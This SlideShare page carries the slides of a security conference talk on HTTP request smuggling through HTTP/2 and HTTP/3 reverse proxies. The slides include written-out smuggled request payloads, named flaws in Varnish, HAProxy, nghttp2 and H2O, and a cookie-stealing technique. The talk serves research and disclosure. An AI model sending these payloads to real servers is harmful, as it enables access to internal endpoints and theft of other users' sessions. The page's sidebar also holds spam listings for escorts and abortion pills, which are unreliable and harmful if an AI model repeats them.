SlideShare a Scribd company logo

HTTP Request Smuggling via higher HTTP versions

N
neexemil

Slides from the talk by Emil Lerner at PhDays 10

Software
1 of 41
Download to read offline
Emil Lerner HTTP Request Smuggling via higher HTTP versions
Emil Lerner independentsecurityresearcher CTO at WunderFund.io Bushwhackers CTF team @emil_lerner @neex
HTTP Client Server HTTP Response HTTP Request
Reverse proxy HTTP Response HTTP Request Client HTTP Response HTTP Request Frontend Server Backend Server
HTTP keep-alive HTTP Response 1 HTTP Request 1 HTTP Response 2 HTTP Request 2 Client Server
HTTP/1.1 body transfer Content-Length header Content-Length: 100 Here goes 100 bytes of the request body. Transfer-Encoding: chunked ff 10 0 Here goes 255-byte chunk Another chunk Chunked encoding
HTTP keep-alive (to backend) HTTP Response 1 HTTP Request 1 HTTP Response 1 HTTP Request 1 HTTP Response 2 HTTP Request 2 HTTP Response 2 HTTP Request 2 Single backend connection Client2 connection Client1 connection Client1 Client2 Frontend Server Backend Server
HTTP Request Smuggling Old & known attack Gained a lot of attention after James Kettle's talk on BH USA 2019 He discovered a lot of new techniques
HTTP Request Smuggling An attacker sends a malicious request It is parsed as a single request by the frontend and is forwarded to the backend Backend parses it as two separate requests
POST / HTTP/1.1 Content-Length: 100 0 Transfer-Encoding : chunked GET /internal HTTP/1.1 ... Frontend interprets this Backend interprets this Frontend thinks it's body Backend thinks it's another request HTTP Request Smuggling
HTTP Request Smuggling It's all about Content-Length / Transfer-Encoding Transfer-Encoding has precedence We need to "smuggle" Transfer-Encoding to backend unprocessed by the frontend
HTTP Request Smuggling POST / HTTP/1.1 Content-Length: 100 Transfer-Encoding: identity, 0 chunked GET /internal HTTP/1.1 ... Frontend interprets this Backend interprets this Frontend thinks it's body Backend thinks it's another request
Exploitation Accessing internal endpoints Cache poisoning Stealing other users’ requests
Exploitation: stealing requests Attacker→Frontend Victim→Frontend GET / HTTP/1.1 ... POST /save HTTP/1.1 Transfer-Encoding : chunked GET / HTTP/1.1 Cookie: secret GET / HTTP/1.1 Transfer-Encoding : chunked ... POST /save HTTP/1.1 data=GET / HTTP/1.1 Cookie: secret Frontend→Backend
Exploitation: stealing requests The victim's request is appended to ours Most frameworks are OK with newlines in forms Victim's cookies are saved to our profile, PMs or other places where we can view them later
HTTP/2 overview Widely adopted by now Binary protocol (no special chars) Almost always terminated at frontend
HTTP/2 termination :status 200 PRI * HTTP/2.0 <binary> :method GET HTTP/1.1 200 OK GET / HTTP/1.1 Frontend Backend Client
HTTP/2 body transfer Request body is transferred in binary frames Content-Length not required, but allowed Transfer-Encoding: chunked has no effect
Potential bug #1: content-length conflicts actual length Client→Frontend :method POST :authority host.com XGET /internal HTTP/1.1 ... content-length: 1 POST / HTTP/1.1 Host: host.com Content-Length: 1 XGET /internal HTTP/1.1 ... Frontend→Backend body
Potential bug #2: no content-length forwarding Client→Frontend :method :authority host.com GET /internal HTTP/1.1 GET GET / HTTP/1.1 Host: host.com GET /internal HTTP/1.1 Frontend→Backend body
Potential bug #3: content-length conflicting transfer-encoding Client→Frontend :method POST :authority host.com content-length: 100 0 GET /internal HTTP/1.1 ... transfer-encoding: chunked POST / HTTP/1.1 Host: host.com Content-Length: 100 Transfer-Encoding: chunked 0 GET /internal HTTP/1.1 ... Frontend→Backend body
HTTP/2 header validation Headers names and values are binary strings Names and values can contain newlines Names can contain colons
Potential bug #4: newlines in headers Client→Frontend :method GET :authority host.com x: ... ⏎⏎GET /internal HTTP/1.1 GET / HTTP/1.1 Host: host.com X: GET /internal HTTP/1.1 ... Frontend→Backend
Potential bug(s) #5: less strict validation Client→Frontend :method POST :authority host.com content-length: 100 0 GET /internal HTTP/1.1 ... transfer-encoding : chunked POST / HTTP/1.1 Host: host.com Content-Length: 100 transfer-encoding : chunked 0 GET /internal HTTP/1.1 ... Frontend→Backend body
Potential bug(s) #5: less strict validation Client→Frontend :method POST :authority host.com content-length: 100 0 GET /internal HTTP/1.1 ... transfer_encoding: chunked POST / HTTP/1.1 Host: host.com Content-Length: 100 Transfer_Encoding: chunked 0 GET /internal HTTP/1.1 ... Frontend→Backend body
Potential bug(s) #5: less strict validation Client→Frontend :method POST :authority host.com content-length: 100 0 GET /internal HTTP/1.1 ... transfer-encoding: chunKed POST / HTTP/1.1 Host: host.com Content-Length: 100 Transfer-Encoding: chunKed 0 GET /internal HTTP/1.1 ... Frontend→Backend body
What does the RFC say? RFC 7540 mentions Intermediary Encapsulation Attacks in 10.3 Basically says "implementation must reject things it can't handle" :) Explicitly mentions newlines and x00
Detection idea #1: make backend expect more data Craft a request such that Backend expects more data Frontend thinks it sent the whole request The request will hang Implemented in James Kettle's Burp plugin (for HTTP/1.1)
Detection idea #1: make backend expect more data :method POST content-length: 5 h:⏎transfer-encoding:chunked fff Frontend interprets this Backend interprets this Frontend thinks body is finished Backend expects more data and hangs
Chunked encoding should never be parsed in HTTP/2 If the response depends on the chunked encoding validness, it is a possible vulnerability There're some false positives Detection idea #2: chunked body parsing
Detection idea #2: chunked body parsing :status 400 :method POST invalid chunked body transfer-encoding : chunked HTTP/1.1 400 POST / HTTP/1.1 transfer-encoding : chunked invalid chunked body Frontend Backend Client
Detection idea #3: content-length parsing Send something like x:x⏎content-length:1000 If the response depends on the value, it's a possible vulnerability Even more false positives :(
False positive scenario HTTP/2 HTTP/2 termination HTTP/1 processing HTTP/1.1 Frontend Backend Client
Varnish flaw Client→Varnish :method GET :authority host.com GET /internal HTTP/1.1 ... content-length: 0 GET / HTTP/1.1 Host: host.com content-length: 0 GET /internal HTTP/1.1 ... Varnish→Backend body
Potential bug #6: RFC 8441 Designed for WebSockets over HTTP/2 A client sends CONNECT method and sets the :protocol special header Intermediary translates it to Upgrade
Haproxy & nghttp2 flaws Client→Frontend :method :authority host.com GET /internal HTTP/1.1 ... CONNECT :protocol websocket GET / HTTP/1.1 Host: host.com Connection: upgrade Upgrade: websocket GET /internal HTTP/1.1 ... Frontend→Backend body
Open problem: one-way size discrepancy Attacks work if the backend reads less data than the frontend Detection methods work if the backend expects more data What if the first is achievable, but the second is not possible?
Client→Frontend Frontend→Backend H2O http3 (QUIC) flaw :method POST content-length: 100 0 GET /internal HTTP/1.1 ... x:x⏎transfer-encoding:chunked POST / HTTP/1.1 Content-length: 100 X: x Transfer-Encoding: chunked 0 GET /internal HTTP/1.1 ... body
Automation I've implemented http2smugl tool It performs automatic vulnerability detection using the discussed methods Also it supports sending "invalid" queries via custom HTTP/2 implementation
Further research needed HTTP/1 special headers, writing to closed streams, HPACK and >40 implementations not researched Stable detection methods wanted Putting space + path into :method can lead to hitting internal endpoints and Host override
Thank you! https://github.com/neex/http2smugl

Recommended

HotPics 2021
HotPics 2021HotPics 2021
HotPics 2021neexemil
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesFrans Rosén
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadSecurity BSides Ahmedabad
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.Mikhail Egorov
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 

Recommended

HotPics 2021
HotPics 2021HotPics 2021
HotPics 2021neexemil
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesFrans Rosén
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadSecurity BSides Ahmedabad
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.Mikhail Egorov
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
SSRF workshop
SSRF workshop SSRF workshop
SSRF workshop Ivan Novikov
 
DNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededDNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededFrans Rosén
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016Aaron Hnatiw
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacksDefconRussia
 
Ssrf
SsrfSsrf
SsrfIlan Mindel
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypassДмитрий Бумов
 
API Testing and Hacking (1).pdf
API Testing and Hacking (1).pdfAPI Testing and Hacking (1).pdf
API Testing and Hacking (1).pdfVishwas N
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictionsMukesh k.r
 
XXE: How to become a Jedi
XXE: How to become a JediXXE: How to become a Jedi
XXE: How to become a JediYaroslav Babin
 
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webappsMikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webappshacktivity
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
Http request smuggling
Http request smugglingHttp request smuggling
Http request smugglingn|u - The Open Security Community
 
Cross Site Request Forgery Vulnerabilities
Cross Site Request Forgery VulnerabilitiesCross Site Request Forgery Vulnerabilities
Cross Site Request Forgery VulnerabilitiesMarco Morana
 
HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0
HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0
HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0Cory Forsyth
 
Http2 kotlin
Http2 kotlinHttp2 kotlin
Http2 kotlinAndrii Bezruchko
 

More Related Content

What's hot

The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
DNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededDNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededFrans Rosén
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016Aaron Hnatiw
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacksDefconRussia
 
API Testing and Hacking (1).pdf
API Testing and Hacking (1).pdfAPI Testing and Hacking (1).pdf
API Testing and Hacking (1).pdfVishwas N
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictionsMukesh k.r
 
XXE: How to become a Jedi
XXE: How to become a JediXXE: How to become a Jedi
XXE: How to become a JediYaroslav Babin
 
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webappsMikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webappshacktivity
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
Cross Site Request Forgery Vulnerabilities
Cross Site Request Forgery VulnerabilitiesCross Site Request Forgery Vulnerabilities
Cross Site Request Forgery VulnerabilitiesMarco Morana
 

What's hot (20)

The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug Bounties
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
 
SSRF workshop
SSRF workshop SSRF workshop
SSRF workshop
 
DNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededDNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification needed
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacks
 
Ssrf
SsrfSsrf
Ssrf
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
 
API Testing and Hacking (1).pdf
API Testing and Hacking (1).pdfAPI Testing and Hacking (1).pdf
API Testing and Hacking (1).pdf
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictions
 
XXE: How to become a Jedi
XXE: How to become a JediXXE: How to become a Jedi
XXE: How to become a Jedi
 
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webappsMikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
 
Http request smuggling
Http request smugglingHttp request smuggling
Http request smuggling
 
Cross Site Request Forgery Vulnerabilities
Cross Site Request Forgery VulnerabilitiesCross Site Request Forgery Vulnerabilities
Cross Site Request Forgery Vulnerabilities
 

Similar to HTTP Request Smuggling via higher HTTP versions

HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0
HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0
HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0Cory Forsyth
 
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...Ontico
 
Interactive web. O rly?
Interactive web. O rly?Interactive web. O rly?
Interactive web. O rly?timbc
 
Hidden Gems in HTTP
Hidden Gems in HTTPHidden Gems in HTTP
Hidden Gems in HTTPBen Ramsey
 
DEF CON 27- ALBINOWAX - http desync attacks
DEF CON 27- ALBINOWAX - http desync attacksDEF CON 27- ALBINOWAX - http desync attacks
DEF CON 27- ALBINOWAX - http desync attacksFelipe Prado
 
Making the Most of HTTP In Your Apps
Making the Most of HTTP In Your AppsMaking the Most of HTTP In Your Apps
Making the Most of HTTP In Your AppsBen Ramsey
 
Http request&response by Vignesh 15 MAR 2014
Http request&response by Vignesh 15 MAR 2014Http request&response by Vignesh 15 MAR 2014
Http request&response by Vignesh 15 MAR 2014Navaneethan Naveen
 
Introduction to HTTP/2
Introduction to HTTP/2Introduction to HTTP/2
Introduction to HTTP/2Ido Flatow
 
Covert Timing Channels using HTTP Cache Headers
Covert Timing Channels using HTTP Cache HeadersCovert Timing Channels using HTTP Cache Headers
Covert Timing Channels using HTTP Cache HeadersDenis Kolegov
 
Hypertex transfer protocol
Hypertex transfer protocolHypertex transfer protocol
Hypertex transfer protocolwanangwa234
 

Similar to HTTP Request Smuggling via higher HTTP versions (20)

HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0
HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0
HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0
 
Http2 kotlin
Http2 kotlinHttp2 kotlin
Http2 kotlin
 
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...
 
Http-protocol
Http-protocolHttp-protocol
Http-protocol
 
Interactive web. O rly?
Interactive web. O rly?Interactive web. O rly?
Interactive web. O rly?
 
Hidden Gems in HTTP
Hidden Gems in HTTPHidden Gems in HTTP
Hidden Gems in HTTP
 
HTTP
HTTPHTTP
HTTP
 
DEF CON 27- ALBINOWAX - http desync attacks
DEF CON 27- ALBINOWAX - http desync attacksDEF CON 27- ALBINOWAX - http desync attacks
DEF CON 27- ALBINOWAX - http desync attacks
 
Appl layer
Appl layerAppl layer
Appl layer
 
HTTP
HTTPHTTP
HTTP
 
Http
HttpHttp
Http
 
HTTP
HTTPHTTP
HTTP
 
Http request&response
Http request&responseHttp request&response
Http request&response
 
Making the Most of HTTP In Your Apps
Making the Most of HTTP In Your AppsMaking the Most of HTTP In Your Apps
Making the Most of HTTP In Your Apps
 
Starting With Php
Starting With PhpStarting With Php
Starting With Php
 
applayerslides.ppt
applayerslides.pptapplayerslides.ppt
applayerslides.ppt
 
Http request&response by Vignesh 15 MAR 2014
Http request&response by Vignesh 15 MAR 2014Http request&response by Vignesh 15 MAR 2014
Http request&response by Vignesh 15 MAR 2014
 
Introduction to HTTP/2
Introduction to HTTP/2Introduction to HTTP/2
Introduction to HTTP/2
 
Covert Timing Channels using HTTP Cache Headers
Covert Timing Channels using HTTP Cache HeadersCovert Timing Channels using HTTP Cache Headers
Covert Timing Channels using HTTP Cache Headers
 
Hypertex transfer protocol
Hypertex transfer protocolHypertex transfer protocol
Hypertex transfer protocol
 

Recently uploaded

Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdfAzure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdfryanfarris8
 
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park %in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park masabamasaba
 
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...Nitya salvi
 
8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech studentsHimanshiGarg82
 
Define the academic and professional writing..pdf
Define the academic and professional writing..pdfDefine the academic and professional writing..pdf
Define the academic and professional writing..pdfPearlKirahMaeRagusta1
 
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...kalichargn70th171
 
Exploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdfExploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdfproinshot.com
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️Delhi Call girls
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Modelsaagamshah0812
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...Health
 
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park %in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park masabamasaba
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Steffen Staab
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providermohitmore19
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerThousandEyes
 
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfonteinmasabamasaba
 
Sector 18, Noida Call girls :8448380779 Model Escorts | 100% verified
Sector 18, Noida Call girls :8448380779 Model Escorts | 100% verifiedSector 18, Noida Call girls :8448380779 Model Escorts | 100% verified
Sector 18, Noida Call girls :8448380779 Model Escorts | 100% verifiedDelhi Call girls
 
The Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdfThe Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdfayushiqss
 
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrainmasabamasaba
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...panagenda
 

Recently uploaded (20)

Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdfAzure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
 
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park %in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
 
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
 
8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students
 
Define the academic and professional writing..pdf
Define the academic and professional writing..pdfDefine the academic and professional writing..pdf
Define the academic and professional writing..pdf
 
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
